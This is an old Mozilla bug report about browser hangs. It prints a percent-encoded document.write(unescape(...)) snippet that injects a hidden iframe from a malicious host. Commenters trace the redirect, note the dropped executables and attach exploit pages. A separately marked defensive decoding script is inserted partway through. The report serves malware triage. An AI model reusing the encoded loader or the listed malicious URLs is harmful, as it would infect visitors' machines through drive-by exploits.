Closed
Bug 406124
Opened 18 years ago
Closed 14 years ago
The vulnerability in JavaScript
Categories
(Core :: JavaScript Engine, defect)
RESOLVED
INCOMPLETE
People
(Reporter: cobalt.sunman, Unassigned)
Attachments
(1 file)
18.95 KB, application/octet-stream
User-Agent: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10
The vulnerability in JavaScript
After loading the following code, the system hangs. Apparatus required rebooting.
Please spruced, further code can spoil your system!
<!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%6C%74%72%61%66%66%69%63%2E%62%69%7A%2F%72%65%73%6F%75%72%63%65%2E%70%68%70%3F%69%64%3D%34%35%36%38%26%75%73%65%72%3D%67%6F%6F%67%6C%65%74%6F%70%31%30%30%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script><!-- c65 -->
Reproducible: Sometimes
Steps to Reproduce:
1.
2.
3.
Saves disable JavaScript
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → FIXED
Comment 2•18 years ago
I ran this code in Firefox 2.0.0.10 on a fully patched Windows XP virtual machine. The result was that Firefox started using over 1.5GB of virtual memory, and spawned new processes visible from task manager: "~.exe", and "_svchost.exe"
This eventually redirects to http://www.sffglkjszf.com/check/version.php?t=565 . The domain appears to be down.
Comment 3•18 years ago
The bit in comment 0 creates an iframe and loads
http://ltraffic.biz/resource.php?id=4568&user=googletop100
That returns a 302 redirect to
http://sffglkjszf.com/check/version.php?t=565
Which now returns no content.
This isn't "FIXED" so much as "evidence is gone", updating resolution
Resolution: FIXED → INCOMPLETE
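The decoding done by hand in comment 3 can be reproduced offline, without rendering the page. The following is an added example, not part of the bug report or of Mozilla's code: it extracts the argument of document.write(unescape(...)), decodes it, and lists any iframe sized or styled to be invisible. The sample page and its dropper.example.test host are constructed, and the function names are hypothetical.

```javascript
// Added example: static triage of document.write(unescape('...')) snippets.
// Nothing is evaluated or fetched; the page text is only pattern-matched.

// Encode every character as %XX (the sample below is ASCII-only).
function percentEncodeAll(s) {
  return Array.from(s, (c) =>
    "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
}

// Constructed sample in the same shape as the snippet in comment 0.
// The host is a reserved .test name, not a value from the bug.
const HIDDEN = "<iframe src='http://dropper.example.test/r.php?id=1' " +
  "width='1' height='1' style='visibility: hidden;'></iframe>";
const SAMPLE_PAGE = "<Script Language='Javascript'>\n<!--\n" +
  "document.write(unescape('" + percentEncodeAll(HIDDEN) + "'));\n//-->\n</script>";

// Decode every string literal passed to document.write(unescape(...)).
function decodeWrites(html) {
  const re = /document\.write(?:ln)?\s*\(\s*unescape\s*\(\s*(['"])([^'"]*)\1\s*\)\s*\)/gi;
  return Array.from(html.matchAll(re), (m) => unescape(m[2]));
}

// List iframes in decoded markup and flag those hidden from the user.
function findIframes(markup) {
  const findings = [];
  for (const m of markup.matchAll(/<iframe\b([^>]*)>/gi)) {
    const attrs = {};
    for (const a of m[1].matchAll(/([\w-]+)\s*=\s*(['"])(.*?)\2/g)) {
      attrs[a[1].toLowerCase()] = a[3];
    }
    const tiny = Number(attrs.width) <= 1 && Number(attrs.height) <= 1;
    const styled = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(attrs.style || "");
    findings.push({ src: attrs.src || null, hidden: tiny || styled });
  }
  return findings;
}

// Full pipeline: page source in, decoded iframe findings out.
function triage(html) {
  return decodeWrites(html).flatMap(findIframes);
}

console.log(triage(SAMPLE_PAGE));
```

Run against saved page source, this reports the iframe target and whether it is hidden, which is the information needed to decide what to block or look for in proxy logs.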
Please spruced, further code can spoil your system!
>>http://209.85.135.104/search?q=cache:NBoDp6nREE0J:www.pogruzchikservice.ru/+%D0%B1%D0%B0%D0%BB%D0%BA%D0%B0%D0%BD%D0%BA%D0%B0%D1%80%D0%B0%D1%81%D0%B5%D1%80%D0%B2%D0%B8%D1%81&hl=ru&ct=clnk&cd=1&gl=ru
Google cache. Here, in this page, is embedded code that exploits the vulnerability. All browsers are vulnerable: Opera, IE, Firefox, Konqueror. Tested on the following systems: Windows 2003 Server SP1, Windows XP SP2, Linux 2.6.22 (Gentoo). Windows often shows a BSOD. Linux hangs for a while. If there is the memory of more than 2Gb on Linux systems process quietly.
Comment 5•18 years ago
The cached google page contained 7 IFRAMEs, each of which loaded exploits. I have attached them in a .zip file, along with the page that included the IFRAMEs.
Updated•18 years ago
Component: Tabbed Browser → JavaScript Engine
Product: Firefox → Core
QA Contact: tabbed.browser → general
Comment 6•18 years ago
Reopening, as there's an attachment with example code now.
Status: RESOLVED → UNCONFIRMED
Resolution: INCOMPLETE → ---
Using Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b1pre) Gecko/20080909032504 Minefield/3.1b1pre
n14041.htm
404-pg N O T ------------------------------ F O U N D ! ! ! TRY LATER
n14042.htm
404-pg N O T ------------------------------ sorry. please check url.
Error: 404 F O U N D ! ! ! TRY LATER
n14043.htm
404-pg N O T ------------------------------ F O U N D ! ! ! TRY LATER
n14044.htm
404-pg N O T ------------------------------ aijsah F O U N D ! ! ! TRY LATER
n14046.htm
100% CPU usage
n14047.htm
404-pg N O T ------------------------------ F O U N D ! ! ! TRY LATER
n14048.htm
404-pg N O T ------------------------------ F O U N D ! ! ! TRY LATER
Comment 8•14 years ago
None of the STR do anything for me in current nightly.
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago → 14 years ago
Resolution: --- → INCOMPLETE